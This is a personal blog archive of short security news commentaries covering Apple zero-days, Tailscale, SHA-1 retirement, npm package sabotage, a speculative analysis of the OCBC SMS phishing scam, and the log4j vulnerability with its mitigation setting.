Categories
security

“Apple patches 17th zero-day of 2023”

Some people are alarmed when they read headlines like these. They may be wondering why Apple’s devices seem to be plagued by so many “security issues.” In fact, if you compare the number of CVEs (which, in layman’s terms, are security bugs) for Apple iOS versus Android, you will find that Android fares much worse in this aspect.

Google » Android : Vulnerability Statistics
Apple » Iphone Os : Vulnerability Statistics

Android has 429 vulnerabilities reported for 2023 as of today, compared to 38 for Apple iOS – more than 10 times as much.

The reality is that all complex software is prone to bugs, and these bugs may or may not be exploitable. Further complicating the issue is that software is not a monolith; rather, it’s composed of numerous parts that are constantly changing due to upgrades, bug fixes, and other developments.

I’ve often said that maintaining running software is like paying a tax, even if “the specs are frozen” and “nothing is changed.” The fact is, things are constantly changing in the software world. New vulnerabilities are discovered in code or libraries, operating system updates roll out regularly, and the threat landscape evolves continuously.

So, why does it seem like Apple is frequently in the spotlight when it comes to security vulnerabilities? There are several reasons for this perception:

  • Popularity and Visibility: Apple’s products, especially iPhones and Macs, are immensely popular worldwide. With a large user base, any security issue that does arise tends to receive significant media attention.
  • Intensive Scrutiny: Apple’s closed ecosystem and stringent control over its hardware and software mean that security researchers and hackers alike often target the company’s products. The more scrutiny a system undergoes, the more vulnerabilities are likely to be discovered.
  • Responsiveness: Apple takes security seriously and is quick to release patches and updates to address vulnerabilities when they are discovered. While this is a proactive approach, it also means that security issues might come to light more frequently.
  • Zero-Day Vulnerabilities: Some vulnerabilities are so new and unexploited that they are termed “zero-day vulnerabilities.” These are often discovered in various software systems, including Apple’s. However, Apple’s high-profile status means that these vulnerabilities gain significant attention.
  • User Expectations: Users of Apple products often have high expectations when it comes to security. Any perceived lapse or vulnerability can generate headlines and discussions.

In reality, all major operating systems, including iOS, Android, Windows, and macOS, face security challenges. The key is how these companies respond to these challenges and their ability to provide timely security updates to protect their users.

To stay safe in the digital age, it’s crucial to keep your devices and software up to date with the latest security patches. Additionally, practicing good cybersecurity habits, such as using strong, unique passwords, enabling two-factor authentication, and being cautious about the apps you download and the websites you visit, can go a long way in protecting your digital life. As technology continues to advance, so do the efforts of those seeking to exploit it. By staying informed and taking proactive security measures, we can all play a role in mitigating the risks associated with our ever-evolving digital landscape.

Source: Apple patches 17th zero-day of 2023

Categories
cloud network security

Tailscale

When I first know about Tailscale, I didn’t “get” it. I read that it is like VPN but not quite the same as your traditional VPN, but I don’t know the details. But since there are a lot of rave reviews from HN users I got curious. After trying it out, I am immediately sold. I have now installed it on all my personal devices.

Tailscale is a revolutionary new way of connecting devices together. Once setup – and it’s very easy to set up – your devices behave just like they are on the same network. No complicated VPN to setup, or persistent connection issues, or remembering IP addresses to access your devices. It just works.

Tailscale is akin to VPN what Dropbox is to file synchronizing.

Tailscale offers a wide range of benefits for businesses and individuals alike. One of the key benefits of Tailscale is that it allows users to access their networks and devices without the need for traditional VPN software. This means that users can access their networks and devices from any device, including smartphones, tablets, and laptops, without the need for additional software or configuration. This makes it extremely convenient for users who need to access their networks and devices while on the go.

Another benefit of Tailscale is that it offers top-of-the-line security. Tailscale uses state-of-the-art encryption to ensure that all data transmitted over the network is secure and protected from cyber threats. This makes it ideal for businesses and organizations that handle sensitive data and need to ensure that it is protected at all times.

The best part is Tailscale is extremely easy to use. It has a simple and intuitive user interface that makes it easy for users of all skill levels to set up and use.

I highly recommend trying it out to just to see how it works. Tailscale is free for personal use.

Categories
programming security

NIST Retires SHA-1 Cryptographic Algorithm | NIST

NIST, the US standards body in charge of cybersecurity, is recommending phasing out the use of SHA-1 due to vulnerabilities in the algorithm and possibility of attacks by powerful machines. Modern browsers have already sunset support for SHA-1. However, older applications may still be using it as a form of checksum.

The venerable cryptographic hash function has vulnerabilities that make its further use inadvisable.

Source: NIST Retires SHA-1 Cryptographic Algorithm | NIST

Categories
cloud security sysadmin

New for Amazon GuardDuty – Malware Detection for Amazon EBS Volumes | AWS News Blog

Once configured, AWS GuardDuty will now scan EBS volumes for malware and report its findings when it detects suspicious activities. If you haven’t enable it already, you should do so.

https://aws.amazon.com/blogs/aws/new-for-amazon-guardduty-malware-detection-for-amazon-ebs-volumes/

When you have GuardDuty Malware Protection enabled, a malware scan is initiated when GuardDuty detects that one of your EC2 instances or container workloads running on EC2 is doing something suspicious.

Categories
security

Security Certification Roadmap – Paul Jerimy Media

It’s probably impossible to get every security certification out there. But it’s still fun to see them being listed and classified neatly like this.

IT Security Certification Roadmap charting security implementation, architecture, management, analysis, offensive, and defensive operation certifications.

Source: Security Certification Roadmap – Paul Jerimy Media

Categories
phishing security

Lupinia Studios – I’m a Scam Prevention Expert, and I Got Scammed

There’s a lot to unpack here: scam prevention expert gets scammed, ‘cos a supposed fraud prevention department turns out to be the actual fraud. Goes to show anyone can fall for these attacks, even experts.

I’m a Scam Prevention Expert, and I Got Scammed

Source: Lupinia Studios – I’m a Scam Prevention Expert, and I Got Scammed

Categories
programming security

BIG sabotage: Famous npm package deletes files to protest Ukraine war

Oh dear. Yet another npm author went rouge. This time it appears that the npm package deletes files for users with Russian/Belarus IP addresses. Time to take package pinning more seriously.

This week, the developer of the popular npm package ‘node-ipc’ released sabotaged versions of the library in protest of the ongoing Russo-Ukrainian War. The ‘node-ipc’ package, which gets downloaded over a million times weekly, began deleting files on developer’s machines, in addition to creating new text files with “peace” messages.

Source: BIG sabotage: Famous npm package deletes files to protest Ukraine war

Categories
privacy security

OCBC phishing scam – how it could have happened

Disclaimer: The following analysis of what could have happened is pure speculation based on publicly available information.

On 8 Jan 2022, news broke that as many as 469 OCBC bank customers were affected by phishing scams, racking losses of up to S$8.5 million in total. This should be one of the biggest and most successful phishing attack of a Singapore bank in recent memory.

Based on details of the news report, it appears that the scam works mainly as a result of 2 factors:
1. Successful social engineering
2. Possible SMS hijacking

Fake bank SMS

According to reports, users who got scammed received SMS messages that appear to originate from the bank. Scammers prey on user’s tendency to trust messages that appear alongside previous legitimate SMSes. How scammers are able to do this is to make use of a feature of SMS sending known as Alphanumeric sender ID. Meaning, they can send an SMS with a chosen sender ID that the bank uses. In this case, they chose “OCBC” as the sender ID. When the user receives such a SMS, it will appear alongside existing SMSes from the same sender ID “OCBC”.

As a quick test, I sent myself a test message with sender ID set to “BOC SG” (what Bank of China Singapore uses) and this is what I see:

This is just to show how easy it is to fake a sender ID. Interestingly, I was unable to reproduce this using “OCBC” as the sender ID, probably because the service provider/ISP is filtering out such IDs.

If a user thinks that it is a legitimate message from the bank, they tend to let their guard down and click on the link that the “bank” has sent – especially if it’s worded as something urgent. In this case it directs to a phishing site that looks exactly like the bank’s login page. Once the user enters their login user/password, the scammer would have captured their login credentials.

SMS hijacking

Just having login credentials is insufficient to make the attack successful. Because most banks would require 2FA for full login and to perform other more important actions like money transfer. This is where the SMS hijacking comes in.

It has been known for quite some time that SMS is NOT a reliable form of 2FA. To understand why, we have to dig into how SMS is implemented. Those who are interested can find out more here. There are some sites – which I won’t link to – that offers to provide such hijacking service for as little as $16.

To cut the long story short, if an attacker knows your mobile phone number, they can intercept your SMS messages, without you knowing. Shocking. I know. But this is well known and has been repeatedly demonstrated in cybersecurity conferences and other public forums.

With both the login credentials and hijacked SMS messages carrying OTP messages, an attacker can in theory carry out transactions without the user being notified.

Actually that is not all, if the bank calls your mobile number – for example, to verify the transaction – that can be intercepted as well via the same mechanism.

Closing the gap

The attack worked in this case because Singapore allows for Alphanumeric sender ID without requiring pre-registration by the sending organization. There are now renewed calls to make pre-registration compulsory to use this feature.

Fixing SMS hijacking – if it’s indeed the mechanism being used – will take more effort and probably require all ISPs to put in place mitigation in their systems. The easier fix may be to deprecate SMS as a 2FA option and stick to other more secure options like authenticating through app or physical tokens.

There are also some questions as to why automatic fraud detection that banks usually have in place is not working in this case. I shall not speculate on this but wait for further information from the investigation.

Conclusion

OCBC customers are not the first to fall prey to scams and neither will they be the last. As we move more and more to the digital world we can expect cyber criminals to keep exploiting both technical loopholes as well as human weaknesses to achieve their objectives. User education remains important and so are improving processes and closing technology gaps.

Categories
bug programming security

Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps

Previously we had attackers using hijacked npm libraries to steal credentials. In this case the libraries or the maintainer wasn’t compromised. In fact it was the maintainer who deliberately introduced bugs into his libraries, thereby breaking thousands of apps that depends on it. There’s no easy solution to this dependency problem. For now use pinned versions and manually approve upgrades.

Users of popular open-source libraries ‘colors’ and ‘faker’ were left stunned after they saw their applications, using these libraries, printing gibberish data and breaking. Some surmised if the NPM libraries had been compromised, but it turns out there’s more to the story.

Source: Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps

Categories
programming security

RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec

log4j is a common logging library for Java applications. This vulnerability is extremely easy to exploit, and allows the attacker to run arbitrary code in the server. IOW, very bad. For now, set log4j.formatMsgNoLookups=true to mitigate the issue, until an official patch is out.

Given how ubiquitous this library is, the impact of this vulnerability is quite severe. Learn how to patch it, why it’s bad, and more in this post.

Source: RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec